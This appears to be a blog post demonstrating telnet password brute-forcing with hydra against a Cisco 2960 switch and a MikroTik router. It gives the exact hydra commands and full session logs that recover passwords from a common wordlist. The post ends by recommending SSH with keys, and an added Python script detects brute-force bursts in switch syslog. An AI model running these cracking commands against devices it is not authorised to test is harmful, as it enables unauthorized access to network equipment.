How to crack the Cisco telnet password on a Cisco 2960 switch.

Cracking the Cisco telnet password on a Cisco 2960 switch is very easy when you are using the hydra password cracking tool. I used this command to crack the telnet login.


hydra -P password.lst 10.42.0.87 cisco

This is the password cracking session that resulted in me cracking the telnet login.

[email protected]:~# hydra -P password.lst 10.42.0.87 cisco
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:28:39
[WARNING] you should set the number of parallel task to 4 for cisco services.
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task
[DATA] attacking service cisco on port 23
[23][cisco] host: 10.42.0.87   password: password

Here is another example: this is a telnet password set on a MikroTik Cloud Switch Router.

[email protected]:~# hydra -l cisco -P password.lst 172.18.31.162 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:42:06
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task
[DATA] attacking service telnet on port 23
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[ERROR] Not a TELNET protocol or service shutdown
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment:
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: This list is based on passwords most commonly seen on a set of Unix
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: systems in mid-1990's, sorted for decreasing number of occurrences
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: (that is, more common passwords are listed first).  It has been
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: revised to also include common website passwords from public lists
[ERROR] Child with pid 8260 terminating, can not connect
[ERROR] Child with pid 8262 terminating, can not connect
[ERROR] Child with pid 8263 terminating, can not connect
[ERROR] Child with pid 8264 terminating, can not connect
[ERROR] Child with pid 8268 terminating, can not connect
[ERROR] Child with pid 8266 terminating, can not connect
[ERROR] Child with pid 8267 terminating, can not connect
[ERROR] Child with pid 8269 terminating, can not connect
[23][telnet] host: 172.18.31.162   login: cisco   password: password1
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: in 1996 through 2011.  It is assumed to be in the public domain.
[23][telnet] host: 172.18.31.162   login: cisco   password: #!comment: This list has been compiled by Solar Designer of Openwall Project
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

This is also easily cracked.

I am using the wordlist from /usr/share/john/password.lst, but there are wordlists in /usr/share/wordlists.

Here is another example:

[email protected]:~# hydra -l cisco -P password.lst 172.18.31.162 telnet
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
 
Hydra (http://www.thc.org/thc-hydra) starting at 2016-05-05 11:49:13
[WARNING] telnet is by its nature unreliable to analyze, if possible better choose FTP, SSH, etc. if available
[DATA] max 16 tasks per 1 server, overall 64 tasks, 3559 login tries (l:1/p:3559), ~3 tries per task
[DATA] attacking service telnet on port 23
[ERROR] Child with pid 14712 terminating, can not connect
[ERROR] Child with pid 14715 terminating, can not connect
[ERROR] Child with pid 14714 terminating, can not connect
[ERROR] Child with pid 14713 terminating, can not connect
[ERROR] Child with pid 14719 terminating, can not connect
[ERROR] Child with pid 14717 terminating, can not connect
[ERROR] Child with pid 14716 terminating, can not connect
[ERROR] Child with pid 14720 terminating, can not connect
[ERROR] Child with pid 14718 terminating, can not connect
[ERROR] Child with pid 14721 terminating, can not connect
[ERROR] Child with pid 15070 terminating, can not connect
[23][telnet] host: 172.18.31.162   login: cisco   password: spring
[23][telnet] host: 172.18.31.162   login: cisco   password: steven
[ERROR] Child with pid 15071 terminating, can not connect
[ERROR] Child with pid 15074 terminating, can not connect
[ERROR] Child with pid 15073 terminating, can not connect
[ERROR] Child with pid 15076 terminating, can not connect
[ERROR] Child with pid 15078 terminating, can not connect
[ERROR] Child with pid 15079 terminating, can not connect
[ERROR] Child with pid 15080 terminating, can not connect
[ERROR] Child with pid 15081 terminating, can not connect
[ERROR] Child with pid 15083 terminating, can not connect
[ERROR] Child with pid 15084 terminating, can not connect
[ERROR] Child with pid 15085 terminating, can not connect
[ERROR] Child with pid 15087 terminating, can not connect
[ERROR] Child with pid 15088 terminating, can not connect
[STATUS] 3559.00 tries/min, 3559 tries in 00:01h, 1 todo in 00:01h, 16 active
[23][telnet] host: 172.18.31.162   login: cisco   password: beavis
[STATUS] 1779.50 tries/min, 3559 tries in 00:02h, 1 todo in 00:01h, 16 active
[STATUS] 1186.33 tries/min, 3559 tries in 00:03h, 1 todo in 00:01h, 16 active
[STATUS] 889.75 tries/min, 3559 tries in 00:04h, 1 todo in 00:01h, 16 active
[STATUS] 711.80 tries/min, 3559 tries in 00:05h, 1 todo in 00:01h, 16 active
[STATUS] 593.17 tries/min, 3559 tries in 00:06h, 1 todo in 00:01h, 16 active
[STATUS] 508.43 tries/min, 3559 tries in 00:07h, 1 todo in 00:01h, 16 active
[STATUS] 444.88 tries/min, 3559 tries in 00:08h, 1 todo in 00:01h, 16 active
^CThe session file ./hydra.restore was written. Type "hydra -R" to resume session.

This goes to show that the telnet protocol is very insecure at the best of times, especially when you are using a weak password. That is why it is better to use SSH on a Cisco switch or router, and SSH keys instead of passwords.
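
From the switch's side, a run like the ones above shows up as a burst of failed logins from one source. The following is an added example (not part of the original post) that flags such bursts in IOS syslog output; it assumes the switch has "login on-failure log" and "login on-success log" configured so that it emits %SEC_LOGIN messages, and the sample lines, addresses, threshold and window are constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample: the %SEC_LOGIN format IOS logs for vty login attempts.
SAMPLE_LOG = """\
May  5 11:28:40: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.42.0.5] [localport: 23] [Reason: Login Authentication Failed] at 11:28:40 UTC Thu May 5 2016
May  5 11:28:40: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.42.0.5] [localport: 23] [Reason: Login Authentication Failed] at 11:28:40 UTC Thu May 5 2016
May  5 11:28:41: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.42.0.5] [localport: 23] [Reason: Login Authentication Failed] at 11:28:41 UTC Thu May 5 2016
May  5 11:28:41: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.42.0.5] [localport: 23] [Reason: Login Authentication Failed] at 11:28:41 UTC Thu May 5 2016
May  5 11:28:42: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: cisco] [Source: 10.42.0.5] [localport: 23] [Reason: Login Authentication Failed] at 11:28:42 UTC Thu May 5 2016
May  5 11:28:43: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: cisco] [Source: 10.42.0.5] [localport: 23] at 11:28:43 UTC Thu May 5 2016
May  5 11:30:02: %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: admin] [Source: 10.42.0.20] [localport: 23] [Reason: Login Authentication Failed] at 11:30:02 UTC Thu May 5 2016
May  5 11:30:15: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: admin] [Source: 10.42.0.20] [localport: 23] at 11:30:15 UTC Thu May 5 2016
"""

EVENT = re.compile(
    r"%SEC_LOGIN-\d-LOGIN_(?P<kind>FAILED|SUCCESS): .*?\[user: (?P<user>[^\]]*)\] "
    r"\[Source: (?P<src>[^\]]+)\] \[localport: \d+\].*? at "
    r"(?P<time>\d\d:\d\d:\d\d) \S+ \S+ (?P<date>\S+ \d+ \d{4})")

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Per source: failure count, whether `threshold` failures fell inside
    `window`, and the user that logged in after such a burst (if any).
    Assumes the log lines are in chronological order."""
    recent = defaultdict(deque)   # source -> timestamps of recent failures
    report = {}
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        when = datetime.strptime(f"{m['time']} {m['date']}", "%H:%M:%S %b %d %Y")
        entry = report.setdefault(
            m["src"], {"failures": 0, "burst": False, "compromised_user": None})
        if m["kind"] == "FAILED":
            entry["failures"] += 1
            q = recent[m["src"]]
            q.append(when)
            while when - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                entry["burst"] = True
        elif entry["burst"]:
            # A success right after a burst means a guess probably worked.
            entry["compromised_user"] = m["user"]
    return report
```

A source with "burst" set and a non-empty "compromised_user" is the case to escalate: the account's password should be treated as known and changed.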
